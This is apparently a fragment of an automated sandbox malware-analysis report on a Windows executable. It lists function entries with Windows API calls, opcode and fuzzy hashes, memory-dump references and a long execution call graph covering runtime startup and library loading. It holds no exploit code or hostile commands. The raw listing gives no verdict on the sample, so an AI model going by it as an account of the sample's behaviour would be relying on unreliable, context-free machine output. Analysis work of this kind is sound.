                                                            • Opcode ID: b04df89e7ed5df788b89fe380f44343aa86461c4a8ffa33747f3d789aefd4e84
                                                            • Instruction ID: 7ede6970ce9771864aba55df4b7520888805e36c1bc456e2fd2ec0cf4c614645
                                                            • Opcode Fuzzy Hash: b04df89e7ed5df788b89fe380f44343aa86461c4a8ffa33747f3d789aefd4e84
                                                            • Instruction Fuzzy Hash: 4CD02B7190853036D60137286C09DAF38156F12730F210714F73D691F6CBBC099182D9
                                                            Function 0004F59E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,0004ED55,?), ref: 0004F5A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0004ED55,?), ref: 0004F5B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
                                                            • Instruction ID: db33f712b1776be1dabc98ae9f917cd820b027d3236f8123634c02a535b62c45
                                                            • Opcode Fuzzy Hash: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
                                                            • Instruction Fuzzy Hash: 06C01272A4475066E63027B16C0DB832E9C5B00711F050458B709EA1C0D7FDD88086E4

                                                            Execution Graph

                                                            Execution Coverage:11.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:36
                                                            execution_graph 19663 7ff6dd671d20 19674 7ff6dd677cb4 19663->19674 19675 7ff6dd677cc1 19674->19675 19676 7ff6dd66af0c __free_lconv_num 11 API calls 19675->19676 19677 7ff6dd677cdd 19675->19677 19676->19675 19678 7ff6dd66af0c __free_lconv_num 11 API calls 19677->19678 19679 7ff6dd671d29 19677->19679 19678->19677 19680 7ff6dd670cb8 EnterCriticalSection 19679->19680 18447 7ff6dd67ab89 18448 7ff6dd67ab98 18447->18448 18449 7ff6dd67aba2 18447->18449 18451 7ff6dd670d18 LeaveCriticalSection 18448->18451 18452 7ff6dd66b590 18453 7ff6dd66b595 18452->18453 18454 7ff6dd66b5aa 18452->18454 18458 7ff6dd66b5b0 18453->18458 18459 7ff6dd66b5f2 18458->18459 18460 7ff6dd66b5fa 18458->18460 18461 7ff6dd66af0c __free_lconv_num 11 API calls 18459->18461 18462 7ff6dd66af0c __free_lconv_num 11 API calls 18460->18462 18461->18460 18463 7ff6dd66b607 18462->18463 18464 7ff6dd66af0c __free_lconv_num 11 API calls 18463->18464 18465 7ff6dd66b614 18464->18465 18466 7ff6dd66af0c __free_lconv_num 11 API calls 18465->18466 18467 7ff6dd66b621 18466->18467 18468 7ff6dd66af0c __free_lconv_num 11 API calls 18467->18468 18469 7ff6dd66b62e 18468->18469 18470 7ff6dd66af0c __free_lconv_num 11 API calls 18469->18470 18471 7ff6dd66b63b 18470->18471 18472 7ff6dd66af0c __free_lconv_num 11 API calls 18471->18472 18473 7ff6dd66b648 18472->18473 18474 7ff6dd66af0c __free_lconv_num 11 API calls 18473->18474 18475 7ff6dd66b655 18474->18475 18476 7ff6dd66af0c __free_lconv_num 11 API calls 18475->18476 18477 7ff6dd66b665 18476->18477 18478 7ff6dd66af0c __free_lconv_num 11 API calls 18477->18478 18479 7ff6dd66b675 18478->18479 18484 7ff6dd66b458 18479->18484 18498 7ff6dd670cb8 EnterCriticalSection 18484->18498 18500 7ff6dd65bf90 18501 7ff6dd65bfa0 18500->18501 18517 7ff6dd66a138 18501->18517 18503 7ff6dd65bfac 18523 7ff6dd65c298 18503->18523 18505 7ff6dd65c57c 7 API calls 18507 7ff6dd65c045 18505->18507 18506 7ff6dd65bfc4 _RTC_Initialize 18515 7ff6dd65c019 18506->18515 18528 7ff6dd65c448 18506->18528 18509 7ff6dd65bfd9 18531 7ff6dd6695a4 18509->18531 18515->18505 18516 7ff6dd65c035 18515->18516 18518 7ff6dd66a149 18517->18518 18519 7ff6dd6654c4 _findclose 11 API calls 18518->18519 18520 7ff6dd66a151 18518->18520 18521 7ff6dd66a160 18519->18521 18520->18503 18522 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18521->18522 18522->18520 18524 7ff6dd65c2a9 18523->18524 18527 7ff6dd65c2ae __scrt_acquire_startup_lock 18523->18527 18525 7ff6dd65c57c 7 API calls 18524->18525 18524->18527 18526 7ff6dd65c322 18525->18526 18527->18506 18556 7ff6dd65c40c 18528->18556 18530 7ff6dd65c451 18530->18509 18532 7ff6dd6695c4 18531->18532 18539 7ff6dd65bfe5 18531->18539 18533 7ff6dd6695cc 18532->18533 18534 7ff6dd6695e2 GetModuleFileNameW 18532->18534 18536 7ff6dd6654c4 _findclose 11 API calls 18533->18536 18535 7ff6dd66960d 18534->18535 18571 7ff6dd669544 18535->18571 18537 7ff6dd6695d1 18536->18537 18538 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18537->18538 18538->18539 18539->18515 18555 7ff6dd65c51c InitializeSListHead 18539->18555 18542 7ff6dd669655 18543 7ff6dd6654c4 _findclose 11 API calls 18542->18543 18544 7ff6dd66965a 18543->18544 18547 7ff6dd66af0c __free_lconv_num 11 API calls 18544->18547 18545 7ff6dd66966d 18546 7ff6dd66968f 18545->18546 18549 7ff6dd6696bb 18545->18549 18550 7ff6dd6696d4 18545->18550 18548 7ff6dd66af0c __free_lconv_num 11 API calls 18546->18548 18547->18539 18548->18539 18551 7ff6dd66af0c __free_lconv_num 11 API calls 18549->18551 18553 7ff6dd66af0c __free_lconv_num 11 API calls 18550->18553 18552 7ff6dd6696c4 18551->18552 18554 7ff6dd66af0c __free_lconv_num 11 API calls 18552->18554 18553->18546 18554->18539 18557 7ff6dd65c426 18556->18557 18559 7ff6dd65c41f 18556->18559 18560 7ff6dd66a77c 18557->18560 18559->18530 18563 7ff6dd66a3b8 18560->18563 18570 7ff6dd670cb8 EnterCriticalSection 18563->18570 18572 7ff6dd66955c 18571->18572 18573 7ff6dd669594 18571->18573 18572->18573 18574 7ff6dd66f158 _findclose 11 API calls 18572->18574 18573->18542 18573->18545 18575 7ff6dd66958a 18574->18575 18576 7ff6dd66af0c __free_lconv_num 11 API calls 18575->18576 18576->18573 19701 7ff6dd665310 19702 7ff6dd66531b 19701->19702 19710 7ff6dd66f764 19702->19710 19723 7ff6dd670cb8 EnterCriticalSection 19710->19723 15355 7ff6dd65c07c 15376 7ff6dd65c24c 15355->15376 15358 7ff6dd65c1c8 15472 7ff6dd65c57c IsProcessorFeaturePresent 15358->15472 15359 7ff6dd65c098 __scrt_acquire_startup_lock 15361 7ff6dd65c1d2 15359->15361 15368 7ff6dd65c0b6 __scrt_release_startup_lock 15359->15368 15362 7ff6dd65c57c 7 API calls 15361->15362 15364 7ff6dd65c1dd __CxxCallCatchBlock 15362->15364 15363 7ff6dd65c0db 15365 7ff6dd65c161 15382 7ff6dd65c6c8 15365->15382 15367 7ff6dd65c166 15385 7ff6dd651000 15367->15385 15368->15363 15368->15365 15461 7ff6dd66a0bc 15368->15461 15373 7ff6dd65c189 15373->15364 15468 7ff6dd65c3e0 15373->15468 15479 7ff6dd65c84c 15376->15479 15379 7ff6dd65c090 15379->15358 15379->15359 15380 7ff6dd65c27b __scrt_initialize_crt 15380->15379 15481 7ff6dd65d998 15380->15481 15508 7ff6dd65d0e0 15382->15508 15386 7ff6dd65100b 15385->15386 15510 7ff6dd6586b0 15386->15510 15388 7ff6dd65101d 15517 7ff6dd665ef8 15388->15517 15390 7ff6dd6539cb 15524 7ff6dd651eb0 15390->15524 15394 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15395 7ff6dd653ae6 15394->15395 15466 7ff6dd65c70c GetModuleHandleW 15395->15466 15396 7ff6dd6539ea 15433 7ff6dd653ad2 15396->15433 15540 7ff6dd657b60 15396->15540 15398 7ff6dd653a1f 15399 7ff6dd653a6b 15398->15399 15401 7ff6dd657b60 61 API calls 15398->15401 15555 7ff6dd658040 15399->15555 15405 7ff6dd653a40 __vcrt_freefls 15401->15405 15402 7ff6dd653a80 15559 7ff6dd651cb0 15402->15559 15405->15399 15409 7ff6dd658040 58 API calls 15405->15409 15406 7ff6dd653b71 15407 7ff6dd653b95 15406->15407 15578 7ff6dd6514f0 15406->15578 15412 7ff6dd653bef 15407->15412 15407->15433 15585 7ff6dd658ae0 15407->15585 15408 7ff6dd651cb0 121 API calls 15410 7ff6dd653ab6 15408->15410 15409->15399 15414 7ff6dd653aba 15410->15414 15415 7ff6dd653af8 15410->15415 15599 7ff6dd656de0 15412->15599 15660 7ff6dd652b30 15414->15660 15415->15406 15673 7ff6dd653fd0 15415->15673 15418 7ff6dd653bcc 15421 7ff6dd653be2 SetDllDirectoryW 15418->15421 15422 7ff6dd653bd1 15418->15422 15421->15412 15423 7ff6dd652b30 59 API calls 15422->15423 15423->15433 15426 7ff6dd653b16 15430 7ff6dd652b30 59 API calls 15426->15430 15427 7ff6dd653c3b 15431 7ff6dd653d06 15427->15431 15440 7ff6dd653c5a 15427->15440 15428 7ff6dd653c09 15428->15427 15705 7ff6dd6565f0 15428->15705 15430->15433 15603 7ff6dd6534c0 15431->15603 15432 7ff6dd653b44 15432->15406 15436 7ff6dd653b49 15432->15436 15433->15394 15692 7ff6dd66018c 15436->15692 15446 7ff6dd653ca5 15440->15446 15741 7ff6dd651ef0 15440->15741 15441 7ff6dd653c3d 15442 7ff6dd656840 FreeLibrary 15441->15442 15442->15427 15446->15433 15745 7ff6dd653460 15446->15745 15448 7ff6dd653d2e 15449 7ff6dd657b60 61 API calls 15448->15449 15452 7ff6dd653d3a 15449->15452 15617 7ff6dd658080 15452->15617 15453 7ff6dd653ce1 15456 7ff6dd656840 FreeLibrary 15453->15456 15456->15433 15462 7ff6dd66a0f4 15461->15462 15463 7ff6dd66a0d3 15461->15463 18275 7ff6dd66a968 15462->18275 15463->15365 15467 7ff6dd65c71d 15466->15467 15467->15373 15469 7ff6dd65c3f1 15468->15469 15470 7ff6dd65c1a0 15469->15470 15471 7ff6dd65d998 __scrt_initialize_crt 7 API calls 15469->15471 15470->15363 15471->15470 15473 7ff6dd65c5a2 _wfindfirst32i64 memcpy_s 15472->15473 15474 7ff6dd65c5c1 RtlCaptureContext RtlLookupFunctionEntry 15473->15474 15475 7ff6dd65c5ea RtlVirtualUnwind 15474->15475 15476 7ff6dd65c626 memcpy_s 15474->15476 15475->15476 15477 7ff6dd65c658 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15476->15477 15478 7ff6dd65c6aa _wfindfirst32i64 15477->15478 15478->15361 15480 7ff6dd65c26e __scrt_dllmain_crt_thread_attach 15479->15480 15480->15379 15480->15380 15482 7ff6dd65d9aa 15481->15482 15483 7ff6dd65d9a0 15481->15483 15482->15379 15487 7ff6dd65dd14 15483->15487 15488 7ff6dd65dd23 15487->15488 15489 7ff6dd65d9a5 15487->15489 15495 7ff6dd65df50 15488->15495 15491 7ff6dd65dd80 15489->15491 15492 7ff6dd65ddab 15491->15492 15493 7ff6dd65ddaf 15492->15493 15494 7ff6dd65dd8e DeleteCriticalSection 15492->15494 15493->15482 15494->15492 15499 7ff6dd65ddb8 15495->15499 15500 7ff6dd65ddfc __vcrt_InitializeCriticalSectionEx 15499->15500 15506 7ff6dd65ded2 TlsFree 15499->15506 15501 7ff6dd65de2a LoadLibraryExW 15500->15501 15502 7ff6dd65dec1 GetProcAddress 15500->15502 15500->15506 15507 7ff6dd65de6d LoadLibraryExW 15500->15507 15503 7ff6dd65de4b GetLastError 15501->15503 15504 7ff6dd65dea1 15501->15504 15502->15506 15503->15500 15504->15502 15505 7ff6dd65deb8 FreeLibrary 15504->15505 15505->15502 15507->15500 15507->15504 15509 7ff6dd65c6df GetStartupInfoW 15508->15509 15509->15367 15512 7ff6dd6586cf 15510->15512 15511 7ff6dd658720 WideCharToMultiByte 15511->15512 15515 7ff6dd6587c6 15511->15515 15512->15511 15514 7ff6dd658774 WideCharToMultiByte 15512->15514 15512->15515 15516 7ff6dd6586d7 __vcrt_freefls 15512->15516 15514->15512 15514->15515 15779 7ff6dd6529e0 15515->15779 15516->15388 15518 7ff6dd670050 15517->15518 15520 7ff6dd6700f6 15518->15520 15522 7ff6dd6700a3 15518->15522 15519 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15523 7ff6dd6700cc 15519->15523 16176 7ff6dd66ff28 15520->16176 15522->15519 15523->15390 15525 7ff6dd651ec5 15524->15525 15526 7ff6dd651ee0 15525->15526 16184 7ff6dd652890 15525->16184 15526->15433 15528 7ff6dd653ec0 15526->15528 15529 7ff6dd65bc60 15528->15529 15530 7ff6dd653ecc GetModuleFileNameW 15529->15530 15531 7ff6dd653efb 15530->15531 15532 7ff6dd653f12 15530->15532 15534 7ff6dd6529e0 57 API calls 15531->15534 16224 7ff6dd658bf0 15532->16224 15536 7ff6dd653f0e 15534->15536 15538 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15536->15538 15537 7ff6dd652b30 59 API calls 15537->15536 15539 7ff6dd653f4f 15538->15539 15539->15396 15541 7ff6dd657b6a 15540->15541 15542 7ff6dd658ae0 57 API calls 15541->15542 15543 7ff6dd657b8c GetEnvironmentVariableW 15542->15543 15544 7ff6dd657bf6 15543->15544 15545 7ff6dd657ba4 ExpandEnvironmentStringsW 15543->15545 15546 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15544->15546 15547 7ff6dd658bf0 59 API calls 15545->15547 15548 7ff6dd657c08 15546->15548 15549 7ff6dd657bcc 15547->15549 15548->15398 15549->15544 15550 7ff6dd657bd6 15549->15550 16235 7ff6dd66a99c 15550->16235 15553 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15554 7ff6dd657bee 15553->15554 15554->15398 15556 7ff6dd658ae0 57 API calls 15555->15556 15557 7ff6dd658057 SetEnvironmentVariableW 15556->15557 15558 7ff6dd65806f __vcrt_freefls 15557->15558 15558->15402 15560 7ff6dd651cbe 15559->15560 15561 7ff6dd651ef0 49 API calls 15560->15561 15562 7ff6dd651cf4 15561->15562 15563 7ff6dd651ef0 49 API calls 15562->15563 15572 7ff6dd651dde 15562->15572 15565 7ff6dd651d1a 15563->15565 15564 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15566 7ff6dd651e6c 15564->15566 15565->15572 16242 7ff6dd651aa0 15565->16242 15566->15406 15566->15408 15570 7ff6dd651dcc 15571 7ff6dd653e40 49 API calls 15570->15571 15571->15572 15572->15564 15573 7ff6dd651d8f 15573->15570 15574 7ff6dd651e34 15573->15574 15575 7ff6dd653e40 49 API calls 15574->15575 15576 7ff6dd651e41 15575->15576 16278 7ff6dd654050 15576->16278 15579 7ff6dd651506 15578->15579 15580 7ff6dd65157f 15578->15580 16320 7ff6dd657950 15579->16320 15580->15407 15583 7ff6dd652b30 59 API calls 15584 7ff6dd651564 15583->15584 15584->15407 15586 7ff6dd658b87 MultiByteToWideChar 15585->15586 15587 7ff6dd658b01 MultiByteToWideChar 15585->15587 15590 7ff6dd658baa 15586->15590 15591 7ff6dd658bcf 15586->15591 15588 7ff6dd658b4c 15587->15588 15589 7ff6dd658b27 15587->15589 15588->15586 15596 7ff6dd658b62 15588->15596 15592 7ff6dd6529e0 55 API calls 15589->15592 15593 7ff6dd6529e0 55 API calls 15590->15593 15591->15418 15594 7ff6dd658b3a 15592->15594 15595 7ff6dd658bbd 15593->15595 15594->15418 15595->15418 15597 7ff6dd6529e0 55 API calls 15596->15597 15598 7ff6dd658b75 15597->15598 15598->15418 15600 7ff6dd656df5 15599->15600 15601 7ff6dd653bf4 15600->15601 15602 7ff6dd652890 59 API calls 15600->15602 15601->15427 15696 7ff6dd656a90 15601->15696 15602->15601 15604 7ff6dd653574 15603->15604 15608 7ff6dd653533 15603->15608 15605 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15604->15605 15606 7ff6dd6535c5 15605->15606 15606->15433 15610 7ff6dd657fd0 15606->15610 15608->15604 16862 7ff6dd651710 15608->16862 16904 7ff6dd652d70 15608->16904 15611 7ff6dd658ae0 57 API calls 15610->15611 15612 7ff6dd657fef 15611->15612 15613 7ff6dd658ae0 57 API calls 15612->15613 15614 7ff6dd657fff 15613->15614 15615 7ff6dd667dec 38 API calls 15614->15615 15616 7ff6dd65800d __vcrt_freefls 15615->15616 15616->15448 15618 7ff6dd658090 15617->15618 15619 7ff6dd658ae0 57 API calls 15618->15619 15661 7ff6dd652b50 15660->15661 15662 7ff6dd664ac4 49 API calls 15661->15662 15663 7ff6dd652b9b memcpy_s 15662->15663 15664 7ff6dd658ae0 57 API calls 15663->15664 15665 7ff6dd652bd0 15664->15665 15666 7ff6dd652c0d MessageBoxA 15665->15666 15667 7ff6dd652bd5 15665->15667 15669 7ff6dd652c27 15666->15669 15668 7ff6dd658ae0 57 API calls 15667->15668 15671 7ff6dd652bef MessageBoxW 15668->15671 15670 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15669->15670 15672 7ff6dd652c37 15670->15672 15671->15669 15672->15433 15674 7ff6dd653fdc 15673->15674 15675 7ff6dd658ae0 57 API calls 15674->15675 15676 7ff6dd654007 15675->15676 15677 7ff6dd658ae0 57 API calls 15676->15677 15678 7ff6dd65401a 15677->15678 17456 7ff6dd6664a8 15678->17456 15681 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15682 7ff6dd653b0e 15681->15682 15682->15426 15683 7ff6dd6582b0 15682->15683 15684 7ff6dd6582d4 15683->15684 15685 7ff6dd660814 73 API calls 15684->15685 15688 7ff6dd6583ab __vcrt_freefls 15684->15688 15686 7ff6dd6582ee 15685->15686 15686->15688 17835 7ff6dd669070 15686->17835 15688->15432 15693 7ff6dd6601bc 15692->15693 15697 7ff6dd656aca 15696->15697 15698 7ff6dd656ab3 15696->15698 15697->15428 15698->15697 17861 7ff6dd6515a0 15698->17861 15700 7ff6dd656ad4 15700->15697 15701 7ff6dd654050 49 API calls 15700->15701 15702 7ff6dd656b35 15701->15702 15703 7ff6dd652b30 59 API calls 15702->15703 15704 7ff6dd656ba5 memcpy_s __vcrt_freefls 15702->15704 15703->15697 15704->15428 15711 7ff6dd65660a memcpy_s 15705->15711 15706 7ff6dd65672f 15708 7ff6dd654050 49 API calls 15706->15708 15710 7ff6dd6567a8 15708->15710 15709 7ff6dd65674b 15712 7ff6dd652b30 59 API calls 15709->15712 15715 7ff6dd654050 49 API calls 15710->15715 15711->15706 15711->15709 15713 7ff6dd654050 49 API calls 15711->15713 15714 7ff6dd656710 15711->15714 15721 7ff6dd651710 144 API calls 15711->15721 15723 7ff6dd656731 15711->15723 17885 7ff6dd651950 15711->17885 15722 7ff6dd656741 __vcrt_freefls 15712->15722 15713->15711 15714->15706 15716 7ff6dd654050 49 API calls 15714->15716 15717 7ff6dd6567d8 15715->15717 15716->15706 15720 7ff6dd654050 49 API calls 15717->15720 15718 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15719 7ff6dd653c1a 15718->15719 15719->15441 15725 7ff6dd656570 15719->15725 15720->15722 15721->15711 15722->15718 15724 7ff6dd652b30 59 API calls 15723->15724 15724->15722 17889 7ff6dd658260 15725->17889 15727 7ff6dd65658c 15728 7ff6dd658260 58 API calls 15727->15728 15729 7ff6dd65659f 15728->15729 15742 7ff6dd651f15 15741->15742 15743 7ff6dd664ac4 49 API calls 15742->15743 15744 7ff6dd651f38 15743->15744 15744->15446 17952 7ff6dd655bc0 15745->17952 15748 7ff6dd6534ad 15748->15453 15798 7ff6dd65bc60 15779->15798 15782 7ff6dd652a29 15800 7ff6dd664ac4 15782->15800 15787 7ff6dd651ef0 49 API calls 15788 7ff6dd652a86 memcpy_s 15787->15788 15789 7ff6dd658ae0 54 API calls 15788->15789 15790 7ff6dd652abb 15789->15790 15791 7ff6dd652af8 MessageBoxA 15790->15791 15792 7ff6dd652ac0 15790->15792 15794 7ff6dd652b12 15791->15794 15793 7ff6dd658ae0 54 API calls 15792->15793 15795 7ff6dd652ada MessageBoxW 15793->15795 15796 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15794->15796 15795->15794 15797 7ff6dd652b22 15796->15797 15797->15516 15799 7ff6dd6529fc GetLastError 15798->15799 15799->15782 15803 7ff6dd664b1e 15800->15803 15801 7ff6dd664b43 15802 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15801->15802 15817 7ff6dd664b6d 15802->15817 15803->15801 15804 7ff6dd664b7f 15803->15804 15830 7ff6dd662d50 15804->15830 15806 7ff6dd664c5c 15809 7ff6dd66af0c __free_lconv_num 11 API calls 15806->15809 15808 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15810 7ff6dd652a57 15808->15810 15809->15817 15818 7ff6dd658560 15810->15818 15811 7ff6dd664c31 15814 7ff6dd66af0c __free_lconv_num 11 API calls 15811->15814 15812 7ff6dd664c80 15812->15806 15813 7ff6dd664c8a 15812->15813 15816 7ff6dd66af0c __free_lconv_num 11 API calls 15813->15816 15814->15817 15815 7ff6dd664c28 15815->15806 15815->15811 15816->15817 15817->15808 15819 7ff6dd65856c 15818->15819 15820 7ff6dd65858d FormatMessageW 15819->15820 15821 7ff6dd658587 GetLastError 15819->15821 15822 7ff6dd6585dc WideCharToMultiByte 15820->15822 15823 7ff6dd6585c0 15820->15823 15821->15820 15825 7ff6dd658616 15822->15825 15826 7ff6dd6585d3 15822->15826 15824 7ff6dd6529e0 54 API calls 15823->15824 15824->15826 15827 7ff6dd6529e0 54 API calls 15825->15827 15828 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15826->15828 15827->15826 15829 7ff6dd652a5e 15828->15829 15829->15787 15831 7ff6dd662d8e 15830->15831 15832 7ff6dd662d7e 15830->15832 15833 7ff6dd662d97 15831->15833 15840 7ff6dd662dc5 15831->15840 15836 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15832->15836 15834 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15833->15834 15835 7ff6dd662dbd 15834->15835 15835->15806 15835->15811 15835->15812 15835->15815 15836->15835 15839 7ff6dd663074 15842 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15839->15842 15840->15832 15840->15835 15840->15839 15844 7ff6dd6636e0 15840->15844 15870 7ff6dd6633a8 15840->15870 15900 7ff6dd662c30 15840->15900 15903 7ff6dd664900 15840->15903 15842->15832 15845 7ff6dd663722 15844->15845 15846 7ff6dd663795 15844->15846 15847 7ff6dd663728 15845->15847 15848 7ff6dd6637bf 15845->15848 15849 7ff6dd66379a 15846->15849 15850 7ff6dd6637ef 15846->15850 15856 7ff6dd66372d 15847->15856 15859 7ff6dd6637fe 15847->15859 15927 7ff6dd661c90 15848->15927 15851 7ff6dd66379c 15849->15851 15852 7ff6dd6637cf 15849->15852 15850->15848 15850->15859 15868 7ff6dd663758 15850->15868 15853 7ff6dd66373d 15851->15853 15858 7ff6dd6637ab 15851->15858 15934 7ff6dd661880 15852->15934 15869 7ff6dd66382d 15853->15869 15909 7ff6dd664044 15853->15909 15856->15853 15860 7ff6dd663770 15856->15860 15856->15868 15858->15848 15862 7ff6dd6637b0 15858->15862 15859->15869 15941 7ff6dd6620a0 15859->15941 15860->15869 15919 7ff6dd664500 15860->15919 15862->15869 15923 7ff6dd664698 15862->15923 15864 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15866 7ff6dd663ac3 15864->15866 15866->15840 15868->15869 15948 7ff6dd66ee18 15868->15948 15869->15864 15871 7ff6dd6633c9 15870->15871 15872 7ff6dd6633b3 15870->15872 15873 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15871->15873 15876 7ff6dd663407 15871->15876 15874 7ff6dd663722 15872->15874 15875 7ff6dd663795 15872->15875 15872->15876 15873->15876 15877 7ff6dd663728 15874->15877 15878 7ff6dd6637bf 15874->15878 15879 7ff6dd66379a 15875->15879 15880 7ff6dd6637ef 15875->15880 15876->15840 15887 7ff6dd66372d 15877->15887 15890 7ff6dd6637fe 15877->15890 15884 7ff6dd661c90 38 API calls 15878->15884 15881 7ff6dd66379c 15879->15881 15882 7ff6dd6637cf 15879->15882 15880->15878 15880->15890 15895 7ff6dd663758 15880->15895 15883 7ff6dd66373d 15881->15883 15888 7ff6dd6637ab 15881->15888 15885 7ff6dd661880 38 API calls 15882->15885 15886 7ff6dd664044 47 API calls 15883->15886 15899 7ff6dd66382d 15883->15899 15884->15895 15885->15895 15886->15895 15887->15883 15889 7ff6dd663770 15887->15889 15887->15895 15888->15878 15892 7ff6dd6637b0 15888->15892 15893 7ff6dd664500 47 API calls 15889->15893 15889->15899 15891 7ff6dd6620a0 38 API calls 15890->15891 15890->15899 15891->15895 15896 7ff6dd664698 37 API calls 15892->15896 15892->15899 15893->15895 15894 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15897 7ff6dd663ac3 15894->15897 15898 7ff6dd66ee18 47 API calls 15895->15898 15895->15899 15896->15895 15897->15840 15898->15895 15899->15894 16104 7ff6dd660e54 15900->16104 15904 7ff6dd664917 15903->15904 16121 7ff6dd66df78 15904->16121 15910 7ff6dd664066 15909->15910 15958 7ff6dd660cc0 15910->15958 15915 7ff6dd6641a3 15917 7ff6dd664900 45 API calls 15915->15917 15918 7ff6dd66422c 15915->15918 15916 7ff6dd664900 45 API calls 15916->15915 15917->15918 15918->15868 15920 7ff6dd664518 15919->15920 15922 7ff6dd664580 15919->15922 15921 7ff6dd66ee18 47 API calls 15920->15921 15920->15922 15921->15922 15922->15868 15926 7ff6dd6646b9 15923->15926 15924 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15925 7ff6dd6646ea 15924->15925 15925->15868 15926->15924 15926->15925 15928 7ff6dd661cc3 15927->15928 15929 7ff6dd661cf2 15928->15929 15931 7ff6dd661daf 15928->15931 15930 7ff6dd660cc0 12 API calls 15929->15930 15933 7ff6dd661d2f 15929->15933 15930->15933 15932 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15931->15932 15932->15933 15933->15868 15935 7ff6dd6618b3 15934->15935 15936 7ff6dd6618e2 15935->15936 15938 7ff6dd66199f 15935->15938 15937 7ff6dd660cc0 12 API calls 15936->15937 15940 7ff6dd66191f 15936->15940 15937->15940 15939 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15938->15939 15939->15940 15940->15868 15942 7ff6dd6620d3 15941->15942 15943 7ff6dd662102 15942->15943 15945 7ff6dd6621bf 15942->15945 15944 7ff6dd660cc0 12 API calls 15943->15944 15947 7ff6dd66213f 15943->15947 15944->15947 15946 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15945->15946 15946->15947 15947->15868 15949 7ff6dd66ee40 15948->15949 15950 7ff6dd66ee85 15949->15950 15951 7ff6dd664900 45 API calls 15949->15951 15952 7ff6dd66ee45 memcpy_s 15949->15952 15954 7ff6dd66ee6e memcpy_s 15949->15954 15950->15952 15950->15954 16101 7ff6dd6704c8 15950->16101 15951->15950 15952->15868 15953 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15953->15952 15954->15952 15954->15953 15959 7ff6dd660cf7 15958->15959 15965 7ff6dd660ce6 15958->15965 15959->15965 15988 7ff6dd66dbbc 15959->15988 15962 7ff6dd660d38 15963 7ff6dd66af0c __free_lconv_num 11 API calls 15962->15963 15963->15965 15964 7ff6dd66af0c __free_lconv_num 11 API calls 15964->15962 15966 7ff6dd66eb30 15965->15966 15967 7ff6dd66eb4d 15966->15967 15968 7ff6dd66eb80 15966->15968 15969 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15967->15969 15968->15967 15971 7ff6dd66ebb2 15968->15971 15970 7ff6dd664181 15969->15970 15970->15915 15970->15916 15977 7ff6dd66ecc5 15971->15977 15981 7ff6dd66ebfa 15971->15981 15972 7ff6dd66edb7 16028 7ff6dd66e01c 15972->16028 15974 7ff6dd66ed7d 16021 7ff6dd66e3b4 15974->16021 15976 7ff6dd66ed4c 16014 7ff6dd66e694 15976->16014 15977->15972 15977->15974 15977->15976 15979 7ff6dd66ed0f 15977->15979 15980 7ff6dd66ed05 15977->15980 16004 7ff6dd66e8c4 15979->16004 15980->15974 15983 7ff6dd66ed0a 15980->15983 15981->15970 15995 7ff6dd66aa3c 15981->15995 15983->15976 15983->15979 15986 7ff6dd66aec4 _wfindfirst32i64 17 API calls 15987 7ff6dd66ee14 15986->15987 15989 7ff6dd66dc07 15988->15989 15993 7ff6dd66dbcb _findclose 15988->15993 15990 7ff6dd6654c4 _findclose 11 API calls 15989->15990 15992 7ff6dd660d24 15990->15992 15991 7ff6dd66dbee RtlAllocateHeap 15991->15992 15991->15993 15992->15962 15992->15964 15993->15989 15993->15991 15994 7ff6dd673c00 _findclose 2 API calls 15993->15994 15994->15993 15996 